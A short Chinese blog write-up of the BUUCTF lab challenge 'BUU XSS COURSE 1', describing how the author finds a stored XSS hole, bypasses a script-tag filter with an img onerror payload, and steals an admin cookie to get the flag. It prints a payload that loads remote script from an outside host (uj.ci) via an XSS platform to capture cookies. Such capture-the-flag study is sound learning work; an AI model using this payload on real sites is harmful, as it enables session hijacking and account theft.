104,【4】 buuctf web [3.3.4 案例分析]BUU XSS COURSE 1

进入靶场

随便提交看看

访问此路径

知道这是存储型xss注入

开始xss注入

试试<script>alert('xss')</script>

不行,是把script过滤了

换一个

<img src=# onerror=alert(1)>

可以

寻找平台,创建项目

https://xssjs.com/

选择超强默认模式

之前测试img可以成功传入,所以选择这个

复制代码
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//uj.ci/wh3';>

记录cookie和url

先改url

显示没登陆是因为cookie没改

f12修改cookie

成功得到flag

我以为和早上的那道题肯定有点区别,可能是plus版,结果就是同一个题。。。。。。。。

相关推荐
90后的晨仔10 分钟前
Vue 内置组件全解析:提升开发效率的五大神器
前端·vue.js
我胡为喜呀13 分钟前
Vue3 中的 watch 和 watchEffect:如何优雅地监听数据变化
前端·javascript·vue.js
我登哥MVP36 分钟前
Ajax 详解
java·前端·ajax·javaweb
非凡ghost1 小时前
Typora(跨平台MarkDown编辑器) v1.12.2 中文绿色版
前端·windows·智能手机·编辑器·软件需求
馨谙1 小时前
/dev/null 是什么,有什么用途?
前端·chrome
JamSlade2 小时前
流式响应 sse 系统全流程 react + fastapi为例子
前端·react.js·fastapi
徐同保2 小时前
react useState ts定义类型
前端·react.js·前端框架
liangshanbo12152 小时前
React 19 vs React 18全面对比
前端·javascript·react.js
望获linux3 小时前
【实时Linux实战系列】Linux 内核的实时组调度(Real-Time Group Scheduling)
java·linux·服务器·前端·数据库·人工智能·深度学习
Never_Satisfied3 小时前
在 JavaScript 中,删除数组中内容为xxx的元素
java·前端·javascript